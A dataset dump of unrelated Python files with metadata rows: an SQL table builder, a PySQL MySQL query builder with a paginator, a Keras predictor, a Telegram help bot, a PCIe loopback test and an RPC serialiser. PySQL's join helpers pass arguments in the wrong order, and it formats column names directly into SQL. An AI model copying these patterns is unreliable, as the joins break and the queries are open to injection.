            loadEntries['loadingFields'] = loadEntries['loadingFields'].rstrip(',')
            loadcode = """LOAD DATA LOCAL INFILE '%(catLoc)s'
            INTO TABLE %(tabName)s FIELDS ESCAPED BY ''
            (%(loadingFields)s)""" % loadEntries
            db.query(loadcode)
            print "enabling keys on %s" % self.tableName
            db.query("ALTER TABLE %s ENABLE KEYS" % self.tableName)
        # If there isn't a 'searchstring' field, it may need to be coerced
        # in somewhere hereabouts.
        # This stores the number of words in between catalog updates, so the
        # full word counts only have to be done once (they're time consuming).
        if self.tableName == "catalog":
            self.createNwordsFile()
        for variable in self.notUniques():
            variable.buildDiskTable()
        for variable in self.variables:
            if variable.datatype == "categorical":
                variable.buildIDTable()

    def uniqueVariableFastSetup(self):
        """
        Build the SQL that (re)creates the in-memory table holding every
        unique variable, keyed on the fast anchor, with categorical fields
        joined through their __id crosswalk tables.
        """
        fileCommand = """DROP TABLE IF EXISTS tmp;
        CREATE TABLE tmp
        (""" + self.fastAnchor + """ MEDIUMINT, PRIMARY KEY (""" + self.fastAnchor + """),
        """ + ",\n".join([variable.fastSQL() for variable in self.variables if (variable.unique and variable.fastSQL() is not None)]) + """
        ) ENGINE=MEMORY;\n"""
        fileCommand += "INSERT INTO tmp SELECT " + self.fastAnchor + ", " + ",".join([variable.fastField for variable in self.variables if variable.unique and variable.fastSQL() is not None]) + " FROM %s " % self.tableName + " ".join([" JOIN %(field)s__id USING (%(field)s ) " % variable.__dict__ for variable in self.variables if variable.unique and variable.fastSQL() is not None and variable.datatype == "categorical"]) + ";\n"
        fileCommand += "DROP TABLE IF EXISTS %s;\n" % self.fastName
        fileCommand += "RENAME TABLE tmp TO %s;\n" % self.fastName
        return fileCommand

    def updateMasterVariableTable(self):
        """
        All the categorical variables get a lookup table; we store the
        create code in the database so the fast tables can be rebuilt.
        """
        for variable in self.variables:
            variable.updateVariableDescriptionTable()
        inCatalog = self.uniques()
        if len(inCatalog) > 0 and self.tableName != "catalog":
            # catalog has separate rules handled in CreateDatabase.py; this
            # builds the big rectangular table otherwise.
            # It will fail if masterTableTable doesn't exist.
            fileCommand = self.uniqueVariableFastSetup()
            try:
                parentTab = self.db.query("""
                SELECT tablename FROM masterVariableTable
                WHERE dbname='%s'""" % self.fastAnchor).fetchall()[0][0]
            except:
                if self.fastAnchor == "bookid":
                    parentTab = "fastcat"
                else:
                    print("Unable to find a table to join the anchor (%s) against" % self.fastAnchor)
                    raise
            self.db.query('DELETE FROM masterTableTable WHERE masterTableTable.tablename="%s";' % self.fastName)
            self.db.query("INSERT IGNORE INTO masterTableTable VALUES ('%s','%s','%s')" % (self.fastName, parentTab, escape_string(fileCommand)))

    def createNwordsFile(self):
        """
        A necessary supplement to the `catalog` table: per-book word counts,
        computed once and cached in `nwords`, then copied onto catalog.
        """
        db = self.db
        db.query("CREATE TABLE IF NOT EXISTS nwords (bookid MEDIUMINT UNSIGNED, PRIMARY KEY (bookid), nwords INT);")
        db.query("UPDATE catalog JOIN nwords USING (bookid) SET catalog.nwords = nwords.nwords")
        # Only books not yet in nwords get their counts summed (expensive).
        db.query("INSERT INTO nwords (bookid,nwords) SELECT catalog.bookid,sum(count) FROM catalog LEFT JOIN nwords USING (bookid) JOIN master_bookcounts USING (bookid) WHERE nwords.bookid IS NULL GROUP BY catalog.bookid")
        db.query("UPDATE catalog JOIN nwords USING (bookid) SET catalog.nwords = nwords.nwords")
class selfDictionary():
    """
    Identity mapping: subscripting returns the key unchanged.

    A stand-in used where code expects a lookup dictionary but no actual
    translation is needed (e.g. when the anchor already is the fast code).
    """
    def __init__(self):
        pass

    def __getitem__(self, key):
        return key
| 47.819499 | 2,558 | 0.582477 | 31,719 | 0.873922 | 0 | 0 | 0 | 0 | 0 | 0 | 17,181 | 0.473371 |
eac66d468a7e07323da015ce90324eb30ccacdcf | 17,976 | py | Python | pysql.py | morfat/PySQL | a887977ec7fc17e34c03027f044c40539d12e046 | [
"MIT"
] | null | null | null | pysql.py | morfat/PySQL | a887977ec7fc17e34c03027f044c40539d12e046 | [
"MIT"
] | null | null | null | pysql.py | morfat/PySQL | a887977ec7fc17e34c03027f044c40539d12e046 | [
"MIT"
] | 1 | 2020-09-14T17:32:59.000Z | 2020-09-14T17:32:59.000Z | import MySQLdb
from urllib import parse
class PySQL:
    """
    Fluent query builder for making MariaDB / MySQL queries through a
    single MySQLdb connection (e.g. ``db.users.filter(...).fetch()``).
    """

    # Maps the public "$"-prefixed filter commands to SQL operator fragments
    # containing %s parameter placeholders. LIKE wildcards are applied to
    # the *parameter* in __make_filter, not to these fragments.
    FILTER_COMMANDS = {
        "$eq": " = %s ",
        "$in": " IN (%s) ",
        "$nin": " NOT IN (%s) ",
        "$neq": " != %s ",
        "$lt": " < %s ",
        "$lte": " <= %s ",
        "$gt": " > %s ",
        "$gte": " >= %s ",
        "$contains": " LIKE %s ",  # param becomes %var%
        "$ncontains": " NOT LIKE %s ",  # param becomes %var%
        "$null": " IS NULL ",  # becomes IS NOT NULL when the value is False
        "$sw": " LIKE %s ",  # starts-with: param becomes var%
        "$ew": " LIKE %s "  # ends-with: param becomes %var
    }
    def __init__(self, user, password, db, host, port):
        # Open the underlying MySQLdb connection immediately; every query
        # issued by this instance runs through this one connection.
        self._mysqldb_connection = MySQLdb.connect(user=user, passwd=password, db=db, host=host, port=port)
def commit(self):
return self._mysqldb_connection.commit()
def rollback(self):
return self._mysqldb_connection.rollback()
def close(self):
return self._mysqldb_connection.close()
def execute(self,sql,params=None,many=None,dict_cursor=True):
#runs the db query . can also be used to run raw queries directly
""" by default returns cursor object """
if dict_cursor:
self.cursor = self._mysqldb_connection.cursor(MySQLdb.cursors.DictCursor)
else:
self.cursor = self._mysqldb_connection.cursor()
if many:
self.cursor.executemany(sql,params)
else:
self.cursor.execute(sql,params)
return self.cursor
    # PySQL-specific builder methods begin from here.
    def __getattr__(self, item):
        # Fluent table selector: `db.users` records "users" as the target
        # table and resets all query-builder state for a fresh query.
        # NOTE(review): __getattr__ fires for *any* missing attribute
        # (including dunder probes made by copy/pickle/hasattr), each of
        # which would clobber the builder state — confirm callers only ever
        # trigger this with table names.
        self.table_name = item
        self.columns = ['*']  # columns selected for display of records
        self.query_params = []  # for db filtering; parameters entered
        self.sql = ''
        self.where_sql = ''
        self.join_sql = ''
        self.order_by_sql = ''
        self.group_by_sql = ''
        self.limit_sql = ''
        self.cursor = None
        return self
def __make_table_column(self,column,table_name=None):
"""Example
Input: => Output:
users.id => users.id
name => users.name
"""
if '.' in column:
return column
return "{}.{}".format(table_name,column) if table_name else "{}.{}".format(self.table_name,column)
def get_columns(self):
return ','.join([self.__make_table_column(c) for c in self.columns])
    def fields(self, columns):
        # Sets the columns to select.
        """Set the column list used by subsequent SELECTs, e.g.
        ['id', 'name']; returns self so calls can be chained."""
        self.columns = columns
        return self
def fetch(self,limit=None):
if not self.cursor:
self.__make_select_sql(limit=limit)
print (self.sql)
print (self.query_params)
self.cursor = self.execute(self.sql,self.query_params)
results = self.cursor.fetchall()
self.cursor.close()
return results
def fetch_one(self):
if not self.cursor:
self.__make_select_sql(limit=None)
self.cursor = self.execute(self.sql,self.query_params)
result = self.cursor.fetchone()
self.cursor.close()
return result
def __set_where(self,where_sql):
if self.where_sql:
#check if where starts with AND or OR
where_sql = where_sql.strip()
if where_sql.startswith('OR') or where_sql.startswith("AND"):
self.where_sql = self.where_sql + " " + where_sql
else:
self.where_sql = self.where_sql + " AND " + where_sql
else:
self.where_sql = " WHERE {} ".format(where_sql)
def __make_sql(self,sql):
if sql:
self.sql = self.sql + sql
    def __make_select_sql(self, limit):
        # Assemble the full statement in SQL clause order:
        # SELECT cols FROM table [JOIN ...] [WHERE ...] [GROUP BY ...]
        # [ORDER BY ...] [LIMIT ...]. Empty fragments are skipped by
        # __make_sql; __limit appends the LIMIT clause last.
        self.sql = "SELECT {} FROM {} ".format(self.get_columns(), self.table_name)
        self.__make_sql(self.join_sql)
        self.__make_sql(self.where_sql)
        self.__make_sql(self.group_by_sql)
        self.__make_sql(self.order_by_sql)
        self.__limit(limit)
    def __make_filter(self,k,v):
        """Translate one filter entry into (bind_param, sql_fragment).

        *k* is the column; *v* is either a plain value (implicit ``$eq``)
        or a one-entry dict like ``{"$lte": 30}``.  ``$null`` yields an
        IS (NOT) NULL fragment with no parameter; ``$in``/``$nin`` expand
        one ``%s`` placeholder per list element; the $contains/$sw/$ew
        family wraps the value in SQL wildcards.  Other operators are
        looked up in ``self.FILTER_COMMANDS`` (defined elsewhere in the
        class -- presumably mapping e.g. ``$eq`` to `` = %s `` -- TODO
        confirm).
        """
        #check if val is dict
        col = k
        filter_v = None #the filter value e.g name like '%mosoti%'
        param = v
        # NOTE(review): debug output -- consider logging.
        print ("Param: ",param, "column:",col)
        if isinstance(param,dict):
            # Take the (operator, value) pair from the one-entry dict.
            filter_v , param = [(k,v) for k,v in param.items()][0]
        else:
            filter_v = "$eq"
        if filter_v == "$null":
            # {"$null": False} means IS NOT NULL; anything else IS NULL.
            if v.get(filter_v) is False:
                filter_v = " IS NOT NULL "
            else:
                filter_v = " IS NULL "
            param = None
        elif filter_v == "$in":
            filter_v = " IN ({}) ".format(','.join(['%s' for i in param]))
        elif filter_v == "$nin":
            filter_v = " NOT IN ({}) ".format(','.join(['%s' for i in param]))
        else:
            if filter_v == '$contains' or filter_v == "$ncontains":
                param = '%{}%'.format(str(param))
            elif filter_v == "$sw":
                param = '{}%'.format(str(param))
            elif filter_v == "$ew":
                param = '%{}'.format(str(param))
            filter_v = self.FILTER_COMMANDS.get(filter_v)
        return (param,filter_v,)
def __make_or_query_filter(self,data_list):
qs_l =[]
for d in data_list:
for ok,ov in d.items():
param,filter_v = self.__make_filter(ok,ov)
self.__build_query_params(param)
q = self.__make_table_column(ok) + filter_v
qs_l.append(q)
query = ' OR '.join(qs_l)
return query
def __build_query_params(self,param):
#appends params to existinig
if param:
if isinstance(param,list):
for p in param:
self.query_params.append(p)
else:
self.query_params.append(param)
    def __filter_query(self,filter_data):
        """Convert *filter_data* into a list of SQL condition fragments.

        Plain keys become AND-joined comparisons (the first one carries
        no connective); ``$or`` appends an OR-joined group prefixed with
        " OR "; ``$xor`` appends the group as " AND ( ... )".  Bind
        parameters accumulate on ``self.query_params`` via
        ``__build_query_params``.
        """
        #make filters
        filter_q_l = []
        for k,v in filter_data.items():
            if k == '$or':
                #make for or
                qs_l =self.__make_or_query_filter(filter_data.get('$or'))
                query = " OR " + qs_l
                filter_q_l.append(query)
            elif k == '$xor':
                # OR-group wrapped in parentheses and ANDed to the rest
                qs_l = self.__make_or_query_filter(filter_data.get('$xor'))
                query = " AND ( " + qs_l + " )"
                filter_q_l.append(query)
            else:
                param,filter_v = self.__make_filter(k,v)
                self.__build_query_params(param)
                q = self.__make_table_column(k) + filter_v
                if len(filter_q_l) == 0:
                    q = q
                else:
                    q = " AND " + q
                filter_q_l.append(q)
        return filter_q_l
    def filter(self,filter_data):
        """
        Filters Requests
        #example full including or
        { "name":{"$contains":"mosoti"},
        "age":{"$lte":30},
        "msisdn":"2541234567",
        "$or":[{ "name":{"$contains":"mogaka"}},
                {"age":31}
            ], #this evaluates to => .. OR name like '%mogaka%' OR age=31
        "$xor":[{ "name":{"$contains":"mogaka"}},
                {"age":31}
            ] # this evalautes to =>... AND ( name like '%mogaka%' OR age=31 )
        }

        Returns ``self`` for chaining; an empty/None *filter_data* is a
        no-op.
        """
        #reset vals /parameters so that we begin here
        if filter_data:
            filter_q_l = self.__filter_query(filter_data)
            filters_qls = ''.join(filter_q_l).strip()
            # Strip a leading connective left over when the first key
            # processed was $or/$xor.
            if filters_qls.startswith("AND"):
                filters_qls = filters_qls[3:]
            elif filters_qls.startswith("OR"):
                filters_qls = filters_qls[2:]
            self.__set_where(filters_qls)
        return self
def fetch_paginated(self,paginator_obj):
#receives paginator object
order_by = paginator_obj.get_order_by()
filter_data = paginator_obj.get_filter_data()
page_size = paginator_obj.page_size
self.filter(filter_data)
self.order_by(order_by)
results = self.fetch(limit = page_size)
pagination_data = paginator_obj.get_pagination_data(results)
return {"results":results,"pagination":pagination_data}
def __limit(self,limit):
if limit:
self.__build_query_params(limit)
self.__make_sql(' LIMIT %s ')
def __get_order_by_text(self,val):
""" Receives string e.g -id or name """
if val.startswith('-'):
return "{} DESC".format(self.__make_table_column(val[1:]))
else:
return "{} ASC".format(self.__make_table_column(val))
def order_by(self,order_by_fields):
"""Expects list of fields e.g ['-id','name'] where - is DESC"""
order_by_sql = ','.join([self.__get_order_by_text(v) for v in order_by_fields])
if self.order_by_sql:
self.order_by_sql = self.order_by_sql + ' , ' + order_by_sql
else:
self.order_by_sql = " ORDER BY " + order_by_sql
return self
def group_by(self,group_by_fields):
""" Expects fields in list ['id','name'] ... """
group_by_sql = ','.join([self.__make_table_column(v) for v in group_by_fields])
if self.group_by_sql:
self.group_by_sql = self.group_by_sql + group_by_sql
else:
self.group_by_sql = " GROUP BY " + group_by_sql
return self
    def __make_join(self,join_type,condition_data=None,related_fields=None,table_name=None):
        """ makes join sql based on type of join and tables """
        # condition_data maps a column on the current table to a column
        # on the joined table: {"id": "customer_id"} ->
        #   ON Current.id = Joined.customer_id
        on_sql = []
        for k,v in condition_data.items():
            on_sql.append("{} = {} ".format(self.__make_table_column(k),self.__make_table_column(v,table_name)))
        on_sql_str = ' ON {} ' .format(' AND '.join(on_sql))
        join_type_sql = '{} {} '.format(join_type,table_name)
        self.join_sql = self.join_sql + join_type_sql + on_sql_str
        #append the columns to select based on related fields
        if related_fields:
            self.columns.extend([self.__make_table_column(c,table_name) for c in related_fields])
def inner_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... INNER JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('INNER JOIN',table_name,condition,related_fields)
return self
def right_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... RIGHT JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('RIGHT JOIN',table_name,condition,related_fields)
return self
def left_join(self,table_name,condition,related_fields=None):
""" e.g Orders,{"id":"customer_id"}, ['quantity']
This will result to :
.... Orders.quantity, .... LEFT JOIN Orders ON Customers.id = Orders.customer_id
"""
self.__make_join('LEFT JOIN',table_name,condition,related_fields)
return self
    def update(self,new_data,limit=None):
        """ set this new data as new details
        Returns cursor object
        """
        # Build "col = %s" fragments for the SET clause.  Parameter order
        # must be SET values first, then any WHERE parameters already
        # collected by filter() -- hence the swap below.
        col_set = ','.join([" {} = %s ".format(k) for k,v in new_data.items()])
        filter_params = self.query_params
        self.query_params = []
        update_params = [v for k,v in new_data.items()]
        update_params.extend(filter_params) #we start with update thn filter
        self.__build_query_params(update_params)
        self.sql = "UPDATE {} SET {} ".format(self.table_name,col_set)
        self.__make_sql(self.where_sql)
        self.__limit(limit)
        # NOTE(review): debug output -- consider logging.
        print(self.query_params)
        print (self.sql)
        return self.execute(self.sql,self.query_params)
def delete(self,limit=None):
""" Delete with given limit """
self.sql = "DELETE FROM {} ".format(self.table_name)
self.__make_sql(self.where_sql)
self.__limit(limit)
print (self.sql)
return self.execute(self.sql,self.query_params)
def insert(self,data):
"""
Creates records to db table . Expects a dict of key abd values pair
"""
columns = []
params = []
for k,v in data.items():
columns.append(k)
params.append(v)
column_placeholders = ','.join(["%s" for v in columns])
columns = ','.join([v for v in columns])
self.query_params = params
self.sql = "INSERT INTO {}({}) VALUES({})".format(self.table_name,columns,column_placeholders)
print (self.sql)
print (self.query_params)
return self.execute(self.sql,self.query_params).lastrowid
class Paginator:
    """Keyset ("last seen") paginator.

    Tracks page number, page size and the keyset value of the last row
    seen on the previous page, and builds next/previous navigation URLs
    by rewriting the ``page``, ``dir`` and ``last_seen`` query
    parameters of ``self.url``.
    """
    def __init__(self,max_page_size=None,url=None,page_number=None,page_size=None,last_seen=None,last_seen_field_name=None,direction=None):
        # Defaults: page 1, max page size 1000, page size 25, keyset
        # column 'id'.  direction is 'next' or 'prev' (None on page 1).
        self.page_number = int(page_number) if page_number else 1
        self.max_page_size = max_page_size if max_page_size else 1000
        if page_size:
            # Clamp the requested page size to the configured maximum.
            if int(page_size) > self.max_page_size:
                self.page_size = self.max_page_size
            else:
                self.page_size = int(page_size)
        else:
            self.page_size = 25
        self.last_seen_field_name = last_seen_field_name if last_seen_field_name else 'id'
        self.direction = direction
        self.last_seen = last_seen
        self.url = url
        self._where_clause = ''
        self._params = []
    def get_order_by(self):
        """Ordering for the page query: descending when moving forward
        (or on page one), ascending when moving back."""
        order_by = []
        if self.page_number == 1 or self.direction == 'next':
            order_by = ["-{}".format(self.last_seen_field_name)] #order descending
        elif self.direction == 'prev':
            order_by = ["{}".format(self.last_seen_field_name)] #order ascending
        return order_by
    def get_filter_data(self):
        """Keyset filter for the page query ({} on page one).

        NOTE(review): ``last_seen`` is interpolated with ``%s`` and so is
        always compared as a *string* -- confirm the keyset column is
        still compared correctly by the database.
        """
        filter_data = None
        if self.page_number == 1:
            filter_data = {}
        elif self.direction == 'prev':
            filter_data = {
                "{}".format(self.last_seen_field_name):{"$gt":"%s"%(self.last_seen)}
            }
        elif self.direction == 'next':
            filter_data = {
                "{}".format(self.last_seen_field_name):{"$lt":"%s"%(self.last_seen)}
            }
        return filter_data
    def get_next_link(self,results_list):
        """URL for the following page, or None when *results_list* is a
        short (final) page."""
        page = self.page_number + 1
        url = self.url
        if len(results_list) < self.page_size:
            return None
        # When paging backwards the rows come back ascending, so the
        # keyset anchor is taken from the other end of the list.
        # NOTE(review): results_list[:-1][0] is the first element for
        # len >= 2 but raises IndexError on a single-row page -- verify.
        if self.direction == 'prev' and page != 2:
            last_seen_dict = results_list[:-1][0]
        else:
            last_seen_dict = results_list[-1:][0]
        url=self.replace_query_param(url, 'page', page)
        url=self.replace_query_param(url, 'dir', 'next')
        url=self.replace_query_param(url, 'last_seen', last_seen_dict.get(self.last_seen_field_name))
        return url
    def get_previous_link(self,results_list):
        """URL for the preceding page, None on page one, or the bare URL
        (pagination params removed) when *results_list* is empty."""
        page=self.page_number - 1
        url=self.url
        if page == 0:
            return None
        elif len(results_list) == 0:
            #return home link
            url=self.remove_query_param(url, 'page')
            url=self.remove_query_param(url, 'dir')
            url=self.remove_query_param(url, 'last_seen')
            return url
        # NOTE(review): same [:-1][0] caveat as get_next_link -- raises
        # IndexError for a single-row page when direction == 'next'.
        if self.direction == 'next' :
            last_seen_dict = results_list[:-1][0]
        else:
            last_seen_dict = results_list[-1:][0]
        #last_seen_dict = results_list[-1:][0]
        url=self.replace_query_param(url, 'page', page)
        url=self.replace_query_param(url, 'dir', 'prev')
        url=self.replace_query_param(url, 'last_seen', last_seen_dict.get(self.last_seen_field_name))
        return url
    def replace_query_param(self,url, key, val):
        """
        Given a URL and a key/val pair, set or replace an item in the query
        parameters of the URL, and return the new URL.
        """
        (scheme, netloc, path, query, fragment) = parse.urlsplit(url)
        query_dict = parse.parse_qs(query, keep_blank_values=True)
        query_dict[str(key)] = [val]
        query = parse.urlencode(sorted(list(query_dict.items())), doseq=True)
        return parse.urlunsplit((scheme, netloc, path, query, fragment))
    def remove_query_param(self,url, key):
        """
        Given a URL and a key/val pair, remove an item in the query
        parameters of the URL, and return the new URL.
        """
        (scheme, netloc, path, query, fragment) = parse.urlsplit(url)
        query_dict = parse.parse_qs(query, keep_blank_values=True)
        query_dict.pop(key, None)
        query = parse.urlencode(sorted(list(query_dict.items())), doseq=True)
        return parse.urlunsplit((scheme, netloc, path, query, fragment))
    def get_pagination_data(self,results_list):
        # Navigation block returned alongside the page's rows.
        return {'page_size':self.page_size,
                'next_url': self.get_next_link(results_list),
                'previous_url': self.get_previous_link(results_list)
        }
eac68a057a3c6cba41ec2dcf68da3a587bccdc99 | 634 | py | Python | src/preprocess.py | Mukulthakur17/Skin-Pigment-Analysis | 5db26fafd38466afa0698333a7b432a8daa8ee06 | [
"MIT"
] | 1 | 2021-04-14T10:08:33.000Z | 2021-04-14T10:08:33.000Z | src/preprocess.py | Mukulthakur17/Skin-Pigment-Analysis | 5db26fafd38466afa0698333a7b432a8daa8ee06 | [
"MIT"
] | null | null | null | src/preprocess.py | Mukulthakur17/Skin-Pigment-Analysis | 5db26fafd38466afa0698333a7b432a8daa8ee06 | [
"MIT"
] | null | null | null | from tensorflow.keras.preprocessing import image
from tensorflow.keras.models import model_from_json
import numpy as np
import tensorflow.keras.models as models
def predict(temp_file):
    """Classify the image at *temp_file*; return the predicted class index.

    The Keras model architecture is read from
    'Model Weights _ Json/model.json' and its weights from
    'Model Weights _ Json/model_weights.h5'.
    NOTE(review): the model is reloaded on every call, which is slow if
    predictions are frequent -- consider caching it.
    """
    img = image.load_img(temp_file, target_size=(224, 224))
    batch = np.expand_dims(image.img_to_array(img), axis=0)
    with open('Model Weights _ Json/model.json', 'r') as json_file:
        architecture = json_file.read()
    model = model_from_json(architecture)
    model.load_weights('Model Weights _ Json/model_weights.h5')
    return np.argmax(model.predict(batch))
| 39.625 | 68 | 0.753943 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 75 | 0.118297 |
eac859440d6090d9d16a4764c580ec95eb663ba2 | 310 | py | Python | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null | help.py | Wizard684/YouTube-DL-Mega | be11833353d116dbcd0a6af902a14cb5bca998a4 | [
"MIT"
] | null | null | null |
from pyrogram import Client, Filters
@Client.on_message(Filters.command(["help"]))
async def start(client, message):
helptxt = f"Currently Only supports Youtube Single (No playlist) Just Send Youtube Url But You must join my Updation channel👉👉 @Mega_Bots_Updates"
await message.reply_text(helptxt)
| 34.444444 | 151 | 0.767742 | 0 | 0 | 0 | 0 | 275 | 0.870253 | 229 | 0.724684 | 149 | 0.471519 |
eac8dea19ee6c42664fa366fdf0d9ec7672d57ac | 4,865 | py | Python | software/scripts/LoopbackTesting.py | slaclab/pgp-pcie-apps | 12b2caa2774255dc748e42cb8296b4fe3c20444c | [
"BSD-3-Clause-LBNL"
] | 2 | 2019-01-31T01:15:23.000Z | 2021-03-12T11:56:10.000Z | software/scripts/LoopbackTesting.py | Tubbz-alt/pgp-pcie-apps | 14c63d7240d6e776ecbc25d20d208acd90cb194b | [
"BSD-3-Clause-LBNL"
] | null | null | null | software/scripts/LoopbackTesting.py | Tubbz-alt/pgp-pcie-apps | 14c63d7240d6e776ecbc25d20d208acd90cb194b | [
"BSD-3-Clause-LBNL"
] | 2 | 2020-09-17T12:47:38.000Z | 2020-12-12T23:09:06.000Z | #!/usr/bin/env python3
##############################################################################
## This file is part of 'PGP PCIe APP DEV'.
## It is subject to the license terms in the LICENSE.txt file found in the
## top-level directory of this distribution and at:
## https://confluence.slac.stanford.edu/display/ppareg/LICENSE.html.
## No part of 'PGP PCIe APP DEV', including this file,
## may be copied, modified, propagated, or distributed except according to
## the terms contained in the LICENSE.txt file.
##############################################################################
import sys
import argparse
import rogue
import rogue.hardware.axi
import rogue.interfaces.stream
import rogue.interfaces.memory
import pyrogue as pr
import pyrogue.pydm
import pyrogue.utilities.prbs
import pyrogue.interfaces.simulation
import axipcie as pcie
import surf.protocols.ssi as ssi
# rogue.Logging.setLevel(rogue.Logging.Warning)
# rogue.Logging.setLevel(rogue.Logging.Debug)
#################################################################
# Set the argument parser
parser = argparse.ArgumentParser()
# Convert str to bool
argBool = lambda s: s.lower() in ['true', 't', 'yes', '1']
# Add arguments
parser.add_argument(
"--type",
type = str,
required = False,
default = 'pcie',
help = "define the type of interface",
)
parser.add_argument(
"--dev",
type = str,
required = False,
default = '/dev/datadev_0',
help = "path to device",
)
parser.add_argument(
"--numLane",
type = int,
required = False,
default = 1,
help = "# of DMA Lanes",
)
parser.add_argument(
"--numVc",
type = int,
required = False,
default = 1,
help = "# of VC (virtual channels)",
)
parser.add_argument(
"--pollEn",
type = argBool,
required = False,
default = True,
help = "Enable auto-polling",
)
parser.add_argument(
"--initRead",
type = argBool,
required = False,
default = True,
help = "Enable read all variables at start",
)
# Get the arguments
args = parser.parse_args()
#################################################################
class MyRoot(pr.Root):
def __init__( self,
name = "pciServer",
description = "DMA Loopback Testing",
**kwargs):
super().__init__(name=name, description=description, **kwargs)
#################################################################
self.dmaStream = [[None for x in range(args.numVc)] for y in range(args.numLane)]
self.prbsRx = [[None for x in range(args.numVc)] for y in range(args.numLane)]
self.prbTx = [[None for x in range(args.numVc)] for y in range(args.numLane)]
# DataDev PCIe Card
if ( args.type == 'pcie' ):
# Create PCIE memory mapped interface
self.memMap = rogue.hardware.axi.AxiMemMap(args.dev)
# Create the DMA loopback channel
for lane in range(args.numLane):
for vc in range(args.numVc):
self.dmaStream[lane][vc] = rogue.hardware.axi.AxiStreamDma(args.dev,(0x100*lane)+vc,1)
# VCS simulation
elif ( args.type == 'sim' ):
self.memMap = rogue.interfaces.memory.TcpClient('localhost',8000)
# Create the DMA loopback channel
for lane in range(args.numLane):
for vc in range(args.numVc):
self.dmaStream[lane][vc] = rogue.interfaces.stream.TcpClient('localhost',8002+(512*lane)+2*vc)
# Undefined device type
else:
raise ValueError("Invalid type (%s)" % (args.type) )
# Add the PCIe core device to base
self.add(pcie.AxiPcieCore(
memBase = self.memMap,
offset = 0x00000000,
numDmaLanes = args.numLane,
expand = True,
))
for lane in range(args.numLane):
for vc in range(args.numVc):
# Connect the SW PRBS Receiver module
self.prbsRx[lane][vc] = pr.utilities.prbs.PrbsRx(name=('SwPrbsRx[%d][%d]'%(lane,vc)),expand=True)
self.dmaStream[lane][vc] >> self.prbsRx[lane][vc]
self.add(self.prbsRx[lane][vc])
# Connect the SW PRBS Transmitter module
self.prbTx[lane][vc] = pr.utilities.prbs.PrbsTx(name=('SwPrbsTx[%d][%d]'%(lane,vc)),expand=True)
self.prbTx[lane][vc] >> self.dmaStream[lane][vc]
self.add(self.prbTx[lane][vc])
#################################################################
with MyRoot(pollEn=args.pollEn, initRead=args.initRead) as root:
pyrogue.pydm.runPyDM(root=root)
#################################################################
| 30.791139 | 114 | 0.542446 | 2,400 | 0.49332 | 0 | 0 | 0 | 0 | 0 | 0 | 1,725 | 0.354573 |
eaca5e1d6b6c0b3a0c295ed41759f106328a2408 | 3,446 | py | Python | MachineInterface/mproxy/core/rpc.py | KTH-HPC/vestec-system | 8168b90385468ca5e1ed701b5a0090e4423186c7 | [
"BSD-3-Clause"
] | 1 | 2021-10-31T08:41:58.000Z | 2021-10-31T08:41:58.000Z | MachineInterface/mproxy/core/rpc.py | KTH-HPC/vestec-system | 8168b90385468ca5e1ed701b5a0090e4423186c7 | [
"BSD-3-Clause"
] | null | null | null | MachineInterface/mproxy/core/rpc.py | KTH-HPC/vestec-system | 8168b90385468ca5e1ed701b5a0090e4423186c7 | [
"BSD-3-Clause"
] | 1 | 2022-02-08T16:57:05.000Z | 2022-02-08T16:57:05.000Z | import inspect
import json
from .serialisation import JsonObjHelper, JsonTypeError
class RpcMethod:
    """Encapsulate argument/result (de)serialisation for a function
    based on a type-annotated function signature and name.
    """

    def __init__(self, name, signature, doc=None):
        """Store *name*, *signature* and optional *doc*.

        A missing or ``None`` return annotation is normalised to
        ``type(None)`` so result (de)serialisation always has a concrete
        type to check against.
        """
        if (
            signature.return_annotation is None
            or signature.return_annotation is signature.empty
        ):
            signature = signature.replace(return_annotation=type(None))
        self.name = name
        self.sig = signature
        self.doc = doc

    @classmethod
    def from_function(cls, func):
        """Factory function from a function"""
        return cls(func.__name__, inspect.signature(func), func.__doc__)

    def call_with(self, obj, arg_dict):
        """Apply a dictionary of arguments, probably from
        deserialise_args, to an object assuming that it has a method
        with our name and signature (less type annotations).
        """
        bound = self.sig.bind(**arg_dict)
        method = getattr(obj, self.name)
        return method(*bound.args, **bound.kwargs)

    def serialise_args(self, *args, **kwargs):
        """Turn this method's args+kwargs into bytes (UTF-8).

        Raises TypeError when an argument does not match its annotated
        type.
        """
        bound = self.sig.bind(*args, **kwargs)
        json_obj = {}
        for name, param in self.sig.parameters.items():
            try:
                py_obj = bound.arguments[name]
            except KeyError:
                # Argument omitted by the caller; its default applies.
                continue
            if not isinstance(py_obj, param.annotation):
                raise TypeError(
                    'Argument "{}" not of type "{}"'.format(name, param.annotation)
                )
            json_obj[name] = JsonObjHelper.py2j(py_obj)
        return json.dumps(json_obj).encode()

    def deserialise_args(self, buf):
        """Turn raw bytes from the wire to a dictionary of arguments
        matching our function signature, that can be applied to the real
        method.

        Raises ValueError for missing required arguments or unknown
        argument names.
        """
        dct = json.loads(buf)
        arg_dict = {}
        for name, param in self.sig.parameters.items():
            try:
                json_obj = dct.pop(name)
            except KeyError:
                py_obj = param.default
                if py_obj is param.empty:
                    raise ValueError("Missing required argument: %s" % name)
            else:
                py_obj = JsonObjHelper.j2py(param.annotation, json_obj)
            arg_dict[name] = py_obj
        if len(dct):
            # Fixed: the original used '"%"' % k, a malformed format
            # string that raised "unsupported format character" instead
            # of naming the offending argument(s).
            raise ValueError(
                "Unknown argument(s): " + ", ".join('"%s"' % k for k in dct.keys())
            )
        return arg_dict

    def serialise_result(self, pyobj):
        """Turn an actual result object into bytes (UTF-8)."""
        rt = self.sig.return_annotation
        if not isinstance(pyobj, rt):
            raise TypeError('Return value not of type "{}"'.format(rt))
        jobj = JsonObjHelper.py2j(pyobj)
        return json.dumps(jobj).encode()

    def deserialise_result(self, buf):
        """Turn raw bytes from the wire to an object of return
        annotation type.
        """
        json_obj = json.loads(buf)
        try:
            return JsonObjHelper.j2py(self.sig.return_annotation, json_obj)
